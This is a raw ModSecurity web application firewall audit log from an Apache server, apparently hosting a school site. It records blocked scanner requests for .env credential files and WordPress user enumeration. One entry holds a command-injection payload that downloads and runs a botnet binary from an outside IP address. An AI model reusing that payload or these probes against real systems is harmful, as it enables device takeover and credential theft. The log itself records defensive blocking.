4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748862273381319 3459 (- - -) Stopwatch2: 1748862273381319 3459; combined=1442, p1=501, p2=908, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d33b1c3c-Z-- --d7019e34-A-- [02/Jun/2025:18:13:02 +0700] aD2HPu6eDjh4wF4csduE2AAAAJc 103.236.140.4 49916 103.236.140.4 8181 --d7019e34-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 Accept-Charset: utf-8 --d7019e34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7019e34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748862782887059 771 (- - -) Stopwatch2: 1748862782887059 771; combined=329, p1=295, p2=0, p3=0, p4=0, p5=34, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7019e34-Z-- --e026e85e-A-- [02/Jun/2025:18:22:19 +0700] aD2Ja-6eDjh4wF4csduFEQAAAJM 103.236.140.4 50198 103.236.140.4 8181 --e026e85e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.207.37.51 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.207.37.51 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --e026e85e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e026e85e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748863339988063 716 (- - -) Stopwatch2: 1748863339988063 716; combined=319, p1=287, p2=0, p3=0, p4=0, p5=31, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e026e85e-Z-- --1c56a060-A-- [02/Jun/2025:18:22:20 +0700] aD2JbH8VMK8tZef_-m_nIAAAAFQ 103.236.140.4 50202 103.236.140.4 8181 --1c56a060-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.207.37.51 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.207.37.51 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --1c56a060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c56a060-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748863340831292 689 (- - -) Stopwatch2: 1748863340831292 689; combined=270, p1=243, p2=0, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c56a060-Z-- --6b2f6216-A-- [02/Jun/2025:18:27:25 +0700] aD2KndG4Cudp_oIcbnPBxwAAABI 103.236.140.4 50416 103.236.140.4 8181 --6b2f6216-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.189.222.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.189.222.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6b2f6216-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b2f6216-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748863645754764 3501 (- - -) Stopwatch2: 1748863645754764 3501; combined=1557, p1=577, p2=949, p3=0, p4=0, p5=31, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b2f6216-Z-- --2f1bb239-A-- [02/Jun/2025:18:28:58 +0700] aD2K-tG4Cudp_oIcbnPBzAAAAAA 103.236.140.4 50430 103.236.140.4 8181 --2f1bb239-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.158.186.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.158.186.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2f1bb239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f1bb239-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748863738903656 3288 (- - -) Stopwatch2: 1748863738903656 3288; combined=1452, p1=503, p2=916, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f1bb239-Z-- --337a6d13-A-- [02/Jun/2025:19:01:53 +0700] aD2SsdG4Cudp_oIcbnPCnwAAAAA 103.236.140.4 51890 103.236.140.4 8181 --337a6d13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 5.104.83.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.104.83.47 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Python/3.13 aiohttp/3.11.18 --337a6d13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --337a6d13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748865713250525 2351 (- - -) Stopwatch2: 1748865713250525 2351; combined=1232, p1=406, p2=796, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --337a6d13-Z-- --609fa301-A-- [02/Jun/2025:19:46:15 +0700] aD2dF9G4Cudp_oIcbnPDOgAAAAQ 103.236.140.4 53390 103.236.140.4 8181 --609fa301-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 Accept-Charset: utf-8 --609fa301-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --609fa301-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748868375764920 931 (- - -) Stopwatch2: 1748868375764920 931; combined=422, p1=380, p2=0, p3=0, p4=0, p5=42, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --609fa301-Z-- --014b701c-A-- [02/Jun/2025:20:02:27 +0700] aD2g438VMK8tZef_-m_obwAAAEU 103.236.140.4 54400 103.236.140.4 8181 --014b701c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15 Accept-Charset: utf-8 --014b701c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --014b701c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748869347354093 839 (- - -) Stopwatch2: 1748869347354093 839; combined=372, p1=321, p2=0, p3=0, p4=0, p5=51, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --014b701c-Z-- --a8057210-A-- [02/Jun/2025:20:30:25 +0700] aD2ncX8VMK8tZef_-m_pKAAAAEw 103.236.140.4 55652 103.236.140.4 8181 --a8057210-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 174.80.96.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 174.80.96.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a8057210-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8057210-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748871025108823 3066 (- - -) Stopwatch2: 1748871025108823 3066; combined=1545, p1=491, p2=1012, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8057210-Z-- --e1c72979-A-- [02/Jun/2025:21:10:41 +0700] aD2w4X8VMK8tZef_-m_rBgAAAFA 103.236.140.4 32864 103.236.140.4 8181 --e1c72979-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F141.98.11.175%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20router HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 176.65.148.234 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.148.234 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --e1c72979-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1c72979-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748873441097027 998 (- - -) Stopwatch2: 1748873441097027 998; combined=438, p1=389, p2=0, p3=0, p4=0, p5=49, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1c72979-Z-- --329e5464-A-- [02/Jun/2025:21:11:44 +0700] aD2xIH8VMK8tZef_-m_rDwAAAE4 103.236.140.4 32906 103.236.140.4 8181 --329e5464-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 106.105.218.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 106.105.218.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --329e5464-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --329e5464-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748873504293217 2991 (- - -) Stopwatch2: 1748873504293217 2991; combined=1272, p1=408, p2=830, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --329e5464-Z-- --5f4bff5d-A-- [02/Jun/2025:21:28:45 +0700] aD21He6eDjh4wF4csduJQQAAAJc 103.236.140.4 33830 103.236.140.4 8181 --5f4bff5d-B-- GET /.env.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 137.184.8.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 137.184.8.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --5f4bff5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f4bff5d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748874525255477 721 (- - -) Stopwatch2: 1748874525255477 721; combined=262, p1=233, p2=0, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f4bff5d-Z-- --b800a427-A-- [02/Jun/2025:21:35:58 +0700] aD22zu6eDjh4wF4csduJUQAAAJc 103.236.140.4 34162 103.236.140.4 8181 --b800a427-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b800a427-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b800a427-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748874958774044 691 (- - -) Stopwatch2: 1748874958774044 691; combined=284, p1=256, p2=0, p3=0, p4=0, p5=28, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b800a427-Z-- --7a44b273-A-- [02/Jun/2025:21:47:06 +0700] aD25atG4Cudp_oIcbnPH3QAAAA8 103.236.140.4 34580 103.236.140.4 8181 --7a44b273-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --7a44b273-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a44b273-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748875626569724 861 (- - -) Stopwatch2: 1748875626569724 861; combined=350, p1=302, p2=0, p3=0, p4=0, p5=48, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a44b273-Z-- --c13bd529-A-- [02/Jun/2025:21:47:08 +0700] aD25bH8VMK8tZef_-m_rWwAAAEg 103.236.140.4 34584 103.236.140.4 8181 --c13bd529-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --c13bd529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c13bd529-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748875628966894 674 (- - -) Stopwatch2: 1748875628966894 674; combined=266, p1=231, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c13bd529-Z-- --fd74df46-A-- [02/Jun/2025:21:48:35 +0700] aD25w38VMK8tZef_-m_rXAAAAE4 103.236.140.4 34658 103.236.140.4 8181 --fd74df46-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 209.38.208.202 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 209.38.208.202 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --fd74df46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd74df46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748875715603555 830 (- - -) Stopwatch2: 1748875715603555 830; combined=332, p1=299, p2=0, p3=0, p4=0, p5=33, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd74df46-Z-- --6fb5f20d-A-- [02/Jun/2025:22:08:53 +0700] aD2-hUA6be0-boUGPH2hUQAAANM 103.236.140.4 39578 103.236.140.4 8181 --6fb5f20d-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 Accept-Charset: utf-8 --6fb5f20d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fb5f20d-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748876933858784 726 (- - -) Stopwatch2: 1748876933858784 726; combined=314, p1=266, p2=0, p3=0, p4=0, p5=48, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fb5f20d-Z-- --bf73370d-A-- [02/Jun/2025:22:10:40 +0700] aD2-8H8VMK8tZef_-m_zNgAAAEc 103.236.140.4 45462 103.236.140.4 8181 --bf73370d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.158.78.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.158.78.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bf73370d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf73370d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
